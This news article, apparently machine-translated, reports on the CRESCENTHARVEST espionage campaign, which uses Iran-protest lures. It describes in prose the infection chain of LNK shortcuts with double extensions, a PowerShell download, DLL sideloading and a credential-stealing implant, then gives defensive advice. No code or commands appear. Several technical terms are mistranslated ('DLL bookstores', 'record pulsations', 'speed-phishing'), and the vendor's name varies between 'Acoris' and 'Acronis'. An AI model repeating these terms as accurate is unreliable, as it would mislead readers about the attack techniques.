CRESCENTHARVEST Explore protests in Iran to spy on and steal data

Cybersecurity researchers have identified a targeted campaign that takes advantage of the outrage and search for information about the protests in Iran to distribute malware. The firm Acoris described this operation under the name of CRESCENTHARVEST, and detected it from January 9; according to their analysis, the attackers intended to install a remote-access Trojan horse (RAT) and a component dedicated to the theft of information with capabilities to execute remote commands, record pulsations and extract sensitive data.

The decoy used by the operators is designed to convince Farsi speakers: a RAR file is packed that appears to contain photographs and videos of the demonstrations, accompanied by a Persian report that allegedly offers updates from "rebel cities." This file includes direct access to Windows with double extension - for example "imagen.jpg.lnk" or "video.mp4.lnk" - a classic trick for the system to show what seems to be a multimedia file but actually runs code. When you open one of those shortcuts, you run a PowerShell script that downloads a second compressed file and, in order not to raise suspicion, simultaneously opens a legitimate image or video as decoy.

The secondary ZIP contains a disturbing combination: a Google-signed binary that is part of the Chrome cleaning utility and several DLL bookstores. Taking advantage of the Windows bookstore search mechanism, attackers cause the legitimate executable to load malicious DLL, a technique known as "DLL sideloading." One of these bookstores acts as a C + + component that draws encryption keys associated with Chrome applications, while another - identified by researchers as the CRESCENTHARVEST implementation - implements the espionage and remote control functions.

The observed capabilities of this implant include the listing of security solutions installed, the list of local accounts, the loading of additional modules, system metadata collection, browser credentials extraction, the exfiltration of Telegram session data in its desktop version and a keylogger. To communicate with your command and control servers, CRESCENTHARVEST uses Windows's WinHTTP API and points to a domain that, according to Acronis, serves to mix your traffic with legitimate communication.

The pattern of attack is not new but effective: to exploit current events to attract victims, to use misleading direct access as an initial vector, and to abuse legitimate binaries signed to avoid security controls. Acronis points out that, although they have not conclusively attributed the operation, the campaign coincides with historical tactics of groups aligned with Iran that have resorted to long-term social engineering and false identities to gain confidence in objectives - a practice documented by agencies and cybersecurity centres as part of the activity of persistent threats. To contextualize the use of this type of maneuvers, the Canadian Cybersecurity Agency's guide on directed and speed-phishing handling campaigns is available. issued by the Government of Canada.

This finding comes shortly after other analyses that also documented attempts to engage activists, journalists and non-governmental organizations related to the reporting of abuses in Iran. External security companies have reported campaigns with similar objectives and methods, indicating that social and journalistic movements around a real conflict become fertile ground for targeted cyber-espionage operations.

From a technical point of view, the campaign uses well-known but dangerous vectors in its combination: the use of direct access (LNK) to deceive the user; the silent discharge of additional devices by PowerShell; the use of a binary signed by a legitimate supplier to load malicious bookstores; and finally a component that draws credentials and data from common applications. Microsoft offers documentation on how Windows solves the load of dynamic bookstores and why sideloading can be exploited in these scenarios, useful information for IT managers and security equipment in official Microsoft documentation.

For people and collectives who cover or follow events in Iran, the risk is double: on the one hand, the motivation to quickly open materials that appear to be relevant is high; on the other, seemingly innocent files can hide tools of persistence and exfiltration. Legitimate browser tools, such as the Chrome cleaning utility whose signature was used in this campaign, can be used in the malicious code loading process; Google explains the function of that component on its support page about Chrome's cleaning tool.

What can those who consider themselves at risk do? In addition to keeping up-to-date systems and software, it is appropriate to avoid opening compressed files or links of doubtful origin, distrusting shortcuts that show double extension and not enabling the execution of scripts without verifying the origin. At the organizational level, monitoring the outgoing traffic, monitoring the execution of unknown binaries and applying policies that restrict the load of DLL from unreliable locations help to reduce the attack surface. For practical recommendations on how to detect and mitigate phishing and speed-phishing campaigns, the Infrastructure and Cybersecurity Agency of the USA United States. (CISA / US-CERT) maintains useful and accessible materials.

The appearance of CRESCENTHARVEST reflects a disturbing pattern: when there is conflict and social movement, actors are ready to exploit attention and solidarity for the benefit of espionage operations. Maintaining the guard, verifying sources and adopting digital hygiene practices is not only a technical recommendation, but a personal and collective security measure for those who report, document or participate in the coverage of these events.

To read the detailed technical analysis of this campaign, Acronis published a report describing the flow of infection and the samples observed on his Threat Research Unit blog.